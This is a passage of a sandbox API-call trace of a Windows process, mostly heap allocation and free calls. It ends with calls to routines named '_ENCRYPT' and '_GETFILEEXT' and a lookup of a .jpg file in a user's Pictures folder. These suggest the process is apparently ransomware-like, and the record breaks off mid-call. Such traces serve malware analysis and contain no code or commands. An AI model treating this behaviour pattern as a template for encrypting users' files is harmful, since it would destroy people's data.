hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0190.427] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0190.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.428] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0190.429] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.429] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.429] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0190.430] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.430] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0190.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd480, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0190.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.431] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0190.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.431] CloseHandle (hObject=0x158) returned 1 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0190.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0190.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.432] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.432] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.432] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0190.433] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.433] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0190.433] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.433] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0190.433] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.433] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.433] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.433] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0190.434] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.434] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe51b8690, 